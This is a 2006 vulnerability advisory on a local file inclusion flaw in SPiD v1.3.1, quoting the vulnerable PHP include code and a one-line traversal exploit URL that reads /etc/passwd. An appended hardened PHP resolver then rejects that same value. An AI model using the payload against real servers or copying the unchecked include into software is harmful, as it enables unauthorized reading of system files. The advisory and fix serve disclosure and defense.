NSAG-201-25.02.2006 Advisory on SPiD v1.3.1 vulnerabilit
`Advisory:
NSAG-№201-25.02.2006
Research:
NSA Group [Russian company on Audit of safety & Network security]
Site of Research:
http://www.nsag.ru or http://www.nsag.org
Product:
SPiD v1.3.1
Site of manufacturer:
http://spid.adnx.net/
The status:
19/01/2006 - Publication is postponed.
14/02/2006 - Answer of the manufacturer is absent.
25/02/2006 - Publication of vulnerability.
Original Advisory:
http://www.nsag.ru/vuln/955.html
Risk:
Hide
Description:
An attacker can craft a query in the URL and gain access to
system files.
Vulnerability code:
+++++++
if (isset($_REQUEST["lang"])) {
    // "lang" is taken from the request and concatenated into the path unchecked
    $file_lang = $lang_path . "lang_" . $_REQUEST["lang"] . ".php";
    if (file_exists($file_lang)) {
        include $lang_path . "lang.php";
        include $file_lang;
.....
skip
+++++++
Exploit:
http://example.com/spiddir/scan_lang_insert.php?lang=../../../../../../../../etc/passwd%00
More information:
http://www.nsag.ru/vuln/955.html
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
www.nsag.ru
«Nemesis» © 2006
------------------------------------
Nemesis Security Audit Group © 2006.
`
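A hardened form of the language-file lookup quoted in the advisory, as an added example (not SPiD's code and not from NSAG). The function name `resolve_lang_file()` and the temporary demo directory are assumptions; the `lang_<code>.php` naming follows the excerpt.

```php
<?php
// Added example (not SPiD code): resolve a language file from untrusted input.
// resolve_lang_file() and the temp-dir layout below are hypothetical.

function resolve_lang_file(string $langPath, $lang): ?string
{
    // Reject non-strings (e.g. lang[]=x) and anything but a short locale code.
    // This excludes "/", "..", and NUL bytes before any path is built.
    if (!is_string($lang) || !preg_match('/\A[a-z]{2}(?:_[A-Z]{2})?\z/', $lang)) {
        return null;
    }
    $base = realpath($langPath);
    if ($base === false) {
        return null;
    }
    $candidate = realpath($base . DIRECTORY_SEPARATOR . 'lang_' . $lang . '.php');
    // Defence in depth: the canonical path must still sit inside $base
    // (catches symlinks planted in the language directory).
    if ($candidate === false
        || strncmp($candidate, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0
        || !is_file($candidate)) {
        return null;
    }
    return $candidate;
}

// Constructed demo data: a throwaway language directory with one file.
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'spid_lang_demo_' . getmypid();
mkdir($dir);
file_put_contents($dir . DIRECTORY_SEPARATOR . 'lang_en.php', "<?php \$msg = 'hello';\n");

$inputs = [
    'en',                                      // legitimate, installed
    'de',                                      // well-formed but not installed
    "../../../../../../../../etc/passwd\0",    // value from the advisory, URL-decoded
    ['en'],                                    // array submitted as lang[]=en
];
foreach ($inputs as $in) {
    $file = resolve_lang_file($dir, $in);
    printf("%-50s => %s\n", json_encode($in, JSON_UNESCAPED_SLASHES),
        $file === null ? 'rejected' : basename($file));
}

unlink($dir . DIRECTORY_SEPARATOR . 'lang_en.php');
rmdir($dir);
```

Only the first input resolves to a file; the caller would `include` the returned path and fall back to a default language when the function returns `null`.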